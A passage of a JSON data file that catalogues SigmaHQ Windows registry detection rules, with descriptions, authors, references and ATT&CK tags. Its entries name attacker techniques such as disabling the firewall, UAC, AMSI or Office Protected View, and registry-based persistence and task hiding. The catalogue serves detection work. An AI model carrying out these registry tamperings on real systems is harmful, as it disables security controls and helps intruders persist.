"b61e87c0-50db-4b2e-8986-6a2be94b33b0", "value": "Directory Service Restore Mode(DSRM) Registry Value Tampering" }, { "description": "Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-06-08", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_disable_protected_view_features.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": 
"windows", "refs": [ "https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5c7a43f-6009-4a8c-80c5-32abf1c53ecc", "value": "Microsoft Office Protected View Disabled" }, { "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Unknown" ], "filename": "registry_set_winlogon_notify_key.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" ], "tags": [ "attack.persistence", "attack.t1547.004" ] }, "related": [ { "dest-uuid": "6836813e-8ec8-4375-b459-abb388cb1a35", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"bbf59793-6efb-4fa1-95ca-a7d288e52c88", "value": "Winlogon Notify Key Logon Persistence" }, { "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Administrators or developers might enable this for testing purposes or to install custom private packages" ], "filename": "registry_set_winget_enable_local_manifest.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winget_enable_local_manifest.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence" ] }, "uuid": "fa277e82-9b78-42dd-b05c-05555c7b6015", "value": "Enable Local Manifest Installation With Winget" }, { "description": "Detects the creation of user-specific or system-wide environment variables via the registry. 
It is limited to variables whose value contains suspicious commands or strings", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-20", "falsepositive": [ "Unknown" ], "filename": "registry_set_suspicious_env_variables.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://infosec.exchange/@sbousseaden/109542254124022664", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence" ] }, "uuid": "966315ef-c5e1-4767-ba25-fce9c8de3660", "value": "Suspicious Environment Variable Has Been Registered" }, { "description": "Detects the \"EnableFirewall\" registry value being set to 0, which disables the Windows Firewall", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_windows_firewall.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "value": "Disable Windows Firewall by Registry" }, { "description": "Detects changes to the default RDP port.\nRemote desktop is a common feature in operating systems. 
It allows a user to log into a remote system using an interactive session with a graphical user interface.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_change_rdp_port.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" ], "tags": [ "attack.persistence", "attack.t1547.010" ] }, "related": [ { "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", "value": "Default RDP Port Changed to Non Standard Port" }, { "description": "Detects changes to the NGenAssemblyUsageLog registry key.\nThe .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable.\nBy simply specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", "meta": { "author": "frack113", "creation_date": "2022-11-18", "falsepositive": [ "Unknown" ], "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28036918-04d3-423d-91c0-55ecf99fb892", "value": "NET NGenAssemblyUsageLog Registry Key Tamper" }, { "description": "Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\nThreat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), @Kostastsale", "creation_date": "2024-08-23", "falsepositive": [ "Unknown" ], "filename": "registry_set_office_disable_python_security_warnings.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_python_security_warnings.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "17e53739-a1fc-4a62-b1b9-87711c2d5e44", "value": "Python Function Execution Security Warning Disabled In Excel - Registry" }, { "description": "Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-08-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_provisioning_command_abuse.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7021255e-5db3-4946-a8b9-0ba7a4644a69", "value": "Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG" }, { "description": "Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value \"EnableLUA\" to 0.\n", "meta": { "author": "frack113", "creation_date": "2022-01-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_disable.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_disable.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": 
"120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", "value": "UAC Disabled" }, { "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "This value is not set by default but could be rarly used by administrators" ], "filename": "registry_set_hangs_debugger_persistence.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", "https://persistence-info.github.io/Data/wer_debugger.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", "value": "Add Debugger Entry To Hangs Key For Persistence" }, { "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-08", "falsepositive": [ "Unknown" ], "filename": "registry_set_dns_server_level_plugin_dll.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002", 
"attack.t1112" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", "value": "New DNS ServerLevelPluginDll Installed" }, { "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", "meta": { "author": "frack113", "creation_date": "2022-03-18", "falsepositive": [ "Legitimate admin script" ], "filename": "registry_set_set_nopolicies_user.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "value": "Registry Explorer Policy Modification" }, { "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. 
An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_ie.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", "value": "Modification of IE Registry Settings" }, { "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_defender_firewall.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "value": "Disable Microsoft Defender Firewall via Registry" }, { "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", "meta": { "author": "frack113", "creation_date": "2022-02-26", "falsepositive": [ "Unknown" ], "filename": "registry_set_office_enable_dde.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" ], "tags": [ "attack.execution", "attack.t1559.002" ] }, "related": [ { "dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63647769-326d-4dde-a419-b925cc0caf42", "value": "Enable Microsoft Dynamic Data Exchange" }, { "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
This could indicate an attacker preparing to encrypt or otherwise manipulate data inside the protected folder", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Legitimate administrators removing folders from the list (should always be investigated)" ], "filename": "registry_delete_exploit_guard_protected_folders.yml", "level": "high", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "value": "Folder Removed From Exploit Guard ProtectedFolders List - Registry" }, { "description": "Detects the removal of the SD (Security Descriptor) value under the \\Schedule\\TaskCache\\Tree registry key, which hides the scheduled task. 
This technique is used by Tarrask malware", "meta": { "author": "Sittikorn S", "creation_date": "2022-04-15", "falsepositive": [ "Unknown" ], "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml", "level": "medium", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", "value": "Removal Of SD Value to Hide Schedule Task - Registry" }, { "description": "Detects the deletion of registry keys containing the MSTSC connection history", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-10-19", "falsepositive": [ "Unknown" ], "filename": "registry_delete_mstsc_history_cleared.yml", "level": "high", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", "http://woshub.com/how-to-clear-rdp-connections-history/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1112" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", "value": "Terminal Server Client Connection History Cleared - Registry" }, { "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "filename": "registry_delete_removal_com_hijacking_registry_key.yml", "level": "medium", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/7", "https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", "https://learn.microsoft.com/en-us/windows/win32/shell/launch", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md", "https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", "value": "Removal of Potential COM Hijacking Registry Keys" }, { "description": "Detects the deletion of AMSI provider registry key 
entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "meta": { "author": "frack113", "creation_date": "2021-06-07", "falsepositive": [ "Unlikely" ], "filename": "registry_delete_removal_amsi_registry_key.yml", "level": "high", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://seclists.org/fulldisclosure/2020/Mar/45", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", "value": "Removal Of AMSI Provider Registry Keys" }, { "description": "Detects the enabling of the Windows Recall feature via registry manipulation. 
Windows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" registry value.\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\n", "meta": { "author": "Sajid Nawaz Khan", "creation_date": "2024-06-02", "falsepositive": [ "Legitimate use/activation of Windows Recall" ], "filename": "registry_delete_enable_windows_recall.yml", "level": "medium", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis", "https://learn.microsoft.com/en-us/windows/client-management/manage-recall", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_enable_windows_recall.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5dfc1465-8f65-4fde-8eb5-6194380c6a62", "value": "Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted" }, { "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-26", "falsepositive": [ "Unknown" ], "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml", "level": "medium", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "value": "Removal Of Index Value to Hide Schedule Task - Registry" }, { "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", "meta": { "author": "Mateusz Wydra, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Creation of non-default, legitimate at usage" ], "filename": "registry_event_susp_atbroker_change.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "value": "Atbroker Registry Change" }, { "description": "Detects the modification of the PortProxy registry key which is used for port forwarding.", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2021-06-22", "falsepositive": [ "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", "Synergy Software KVM (https://symless.com/synergy)" ], "filename": "registry_event_portproxy_registry_key.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" ], "tags": [ "attack.lateral-movement", "attack.defense-evasion", "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", "value": "New PortProxy Registry Entry Added" }, { "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", 
"level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" ], "tags": [ "attack.persistence", "attack.t1546.009" ] }, "related": [ { "dest-uuid": "7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", "value": "New DLL Added to AppCertDlls Registry Key" }, { "description": "Alerts on trust record modification within the registry, indicating usage of macros", "meta": { "author": "Antonlovesdnb, Trent Liffick (@tliffick)", "creation_date": "2020-02-19", "falsepositive": [ "This will alert on legitimate macro usage as well, additional tuning is required" ], "filename": "registry_event_office_trust_record_modification.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", "value": "Windows Registry Trust Record Modification" }, { "description": "Detects static QMS 810 and mimikatz driver name used by 
Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", "meta": { "author": "Markus Neis, @markus_neis, Florian Roth", "creation_date": "2021-07-04", "falsepositive": [ "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], "filename": "registry_event_mimikatz_printernightmare.yml", "level": "critical", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", "https://nvd.nist.gov/vuln/detail/cve-2021-1675", "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", "https://nvd.nist.gov/vuln/detail/cve-2021-34527", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" ], "tags": [ "attack.execution", "attack.t1204", "cve.2021-1675", "cve.2021-34527" ] }, "related": [ { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "value": "PrinterNightmare Mimikatz Driver Name" }, { "description": "Detects persistence registry keys for Recycle Bin", "meta": { "author": "frack113", "creation_date": "2021-11-18", "falsepositive": [ "Unknown" ], "filename": "registry_event_persistence_recycle_bin.yml", "level": "high", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", "https://persistence-info.github.io/Data/recyclebin.html", 
